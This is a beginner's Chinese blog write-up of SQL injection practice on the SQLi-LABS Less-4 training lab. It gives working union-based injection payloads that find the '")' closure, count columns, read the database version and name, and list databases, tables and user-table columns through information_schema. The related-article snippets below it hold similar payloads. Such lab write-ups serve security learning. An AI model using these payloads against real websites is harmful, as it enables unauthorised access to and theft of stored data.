SQLi-LABS less-4打靶过程记录——初学者的打靶记录

最新推荐文章于 2024-08-15 16:50:11 发布
最新推荐文章于 2024-08-15 16:50:11 发布
阅读量107 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xxfsdsb/article/details/125223333
版权

与less-3类似,只是闭合方式不一样,less-3是单引号+右括号,less-4是双引号+右括号。

实验操作

在URL地址栏后加上?id=1进行参数传递输入,读取数据库中这个表里id为1的数据,可以看到显示出了id=1的登录名和密码

输入?id=1'后无报错

 

输入?id=1" 后出现报错信息:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

错误提示是【"1"") LIMIT 0,1】,去掉自己输入的一个双引号后可以看出还有两个双引号和一个右括号,由此判可推出SQL注入是由双引号和右括号和起来的闭合模式。

 

输入?id=1") order by 4 -- -后,提示超出列数,则尝试把4改成3,发现无报错,说明数据库查询语句查询列数为3列。 

​​

 

使用union 查看输出列的位置,输入?id=-1") union select 1,2,3 -- -,可以看出显示的是2,3列的数据,然后修改2,3的值,就能在2,3列输出想要知道的数据。

 输入?id=-1") union select 1,version(),database()-- -,可以查看数据库版本和数据库名字

​​​​​​​​

 数据库在5.0版本以上的可以利用information_schema库里的schemata表查询schema_name来获取所有数据库名,用tables表查询table_name来获取指定数据库的所有表名,用colunms表查询column_name来获取指定表的所有列名。

输入?id=-1") union select 1,GROUP_CONCAT(SCHEMA_NAME),3 from information_schema.schemata -- -,查询所有数据库名

输入?id=-1") union select 1,group_concat(TABLE_NAME),3 from information_schema.TABLES where TABLE_SCHEMA='security' -- -,查询security库的表

 输入?id=-1") union select 1,GROUP_CONCAT(COLUMN_NAME),3 from information_schema.COLUMNS where TABLE_SCHEMA='security' and TABLE_NAME='users' -- -,查询user表的所有列

 

滴滴答答小哪吒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs靶场(Less-1--Less-4)
weixin_46062722的博客
12-25 181
SQL注入流程: Less-1 来到第一关我们发现是要求给id这个参数一个值所以我们直接通过GET的方式提交ID的值即可 http://192.168.0.105:8086/sqlilabs/Less-1/index.php?id=1’ 我们发现提交ID值之后回显了用户名和登录密码,在后面加入单引号使其报错,报错结果为 这里为什么加上一个单引号会报错,基于SQL注入的原理就不在做过多的阐述,而是更多的放在漏洞的发现与利用!!! 在此我们推理下网页代码中的SQL注入语句: SELECT * FROM us
SQLi-LABS less-3打靶过程记录——初学者打靶记录
xxfsdsb的博客
06-10 495
SQLi-LABS less-3打靶过程记录——初学者打靶记录
sqli-labs靶场实现(一)【GET基于报错的SQL注入】(less-1~4、具体步骤+图文详解)
weixin_46709219的博客
12-12 738
一)GET基于报错的SQL注入 1)SQL注入的分类 2)get基于报错的SQL注入发现 3)get基于报错的SQL注入利用 4)利用sqlmap测试 二) 三) —————————————————————————————————————————————————— 一)GET基于报错的SQL注入 1)SQL注入的分类 2)get基于报错的SQL注入发现 3)get基于报错的SQL注入利用 4)利用sqlmap测试 ...
sqli靶场通关之less4
sunxueer的博客
07-15 337
sqli less4 方法一:updatexml报错函数 1. 找闭合字符 id = 1”) //异常 id = 1”) and 1 =1 -- + //正确 id = 1”) and 1 =2 -- + //错误 说明可能存在双引号字符型注入 2. 求列数 id=1") order by 3 -- + id=1") order by 4 -- + 说明有3列 3. 求显示位 id=1") and 1=2 union select 1,2,3 -- + 4. 爆数据库名 id=1"
【less-4】sqli-labs靶场第四关
未名编程
07-19 232
网址 https://sqli.wmcoder.site/sqli-labs/Less-4/ 解法 与Less-2类似,直接看这篇文章:【less-2】sqli-labs靶场第二关 不同的是,根据错误回显知道,其拼接方式为id=("$id") 故采用https://sqli.wmcoder.site/sqli-labs/Less-2/?id=1") 采用如下语句获取所有用户名和密码 https://sqli.wmcoder.site/sqli-labs/Less-4/?id=1") and 1=2 unio
打靶sqli-labs靶场3-4
weixin_48852738的博客
06-11 967
sqli-labs靶场3-4
SQLI labs靶场记录Less-1
huixing2022的博客
05-12 297
随便的简单记录下,看自己能打到多少层 get型 判断字符型还是数字型: 字符型 判断列数: order by x%23 一共有3列 判断显示位:union select 1,2,3%23 显示位在2和3 查询数据库名:union select 1,database(),3%23 数据库名为security 查询数据库所有表名: union select 1,group_concat(table_name),3 from informat...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
H5直播行业的安全挑战:为何害怕黑客攻击?
@云安全小杜
08-13 468
随着移动互联网的快速发展,H5直播因其便捷性和互动性成为众多平台的选择。然而,这种开放性和交互性也带来了安全风险,使得H5直播行业成为了黑客攻击的目标之一。本文将探讨H5直播面临的常见威胁,并提供一些基本的防御措施。
企业如何组建安全稳定的跨国通信网络
TIANGEKUAJING的博客
08-13 294
当企业在海外设有分公司时,如何建立一个安全且稳定的跨国通信网络是一个关键问题。为了确保跨国通信的安全和稳定性,可以考虑以下几种方案。
安全自动化和编排:如何使用自动化工具和编排技术来提高安全操作效率。(第二篇)
艰难的活着
08-13 1038
深入理解Kubernetes环境中的安全自动化与编排(第二篇)
安全基础学习-RC4加密算法
小夭的博客
08-13 796
密钥调度算法 (KSA):用密钥打乱一个初始数组。伪随机数生成算法 (PRGA):使用打乱后的数组生成伪随机字节流。加密/解密:将明文与伪随机字节流异或生成密文,反过来也是一样的。RC4因其简单性和高效性被广泛使用,但其安全性在现代已经不再被推荐,尤其是当密钥长度不足或者使用不当时,可能会导致加密被破解。
同态加密和SEAL库的介绍(十)CKKS 参数心得 2
WaitMrAnt的博客
08-12 819
本篇继续上篇针对 CKKS 方案的测试,首先证明了重新线性化虽然会减少密文长度,但是并不会对计算结果的精度有明显的影响;模数链的长度确实会限制乘法深度(具体来说是 Rescale 次数),这点上密文乘法和明文乘法相同;上篇中证明了增加 scale 会提高精度,本篇也证明了增长模数链也能增加精度,但是内存测试后,前者 scale 不会提高内存,后者会增加内存成本和时间成本。
文件上传-.htaccess利用
feiwujiushiwo的博客
08-13 448
限于Apache.htaccess文件是服务器中的一个配置文件,它负责相关目录下的网页配置。笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。
HTTP代理IP如何助力旅游大数据领域?怎么建立安全的代理隧道连接?
最新发布
yls5yl的博客
08-15 340
HTTP代理IP在旅游大数据领域的应用不仅提升了数据抓取的效率和准确性,还有效避免了IP封禁和确保了数据质量。同时,建立安全的代理隧道连接是保障数据传输安全的关键步骤。通过使用加密协议、配置VPN隧道、定期更新IP、实施访问控制以及监控代理使用,你可以有效提升数据采集和传输的安全性。通过合理利用HTTP代理IP,并遵循最佳安全实践,旅游行业可以更好地利用大数据进行分析和决策,从而获得竞争优势并提升业务效果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值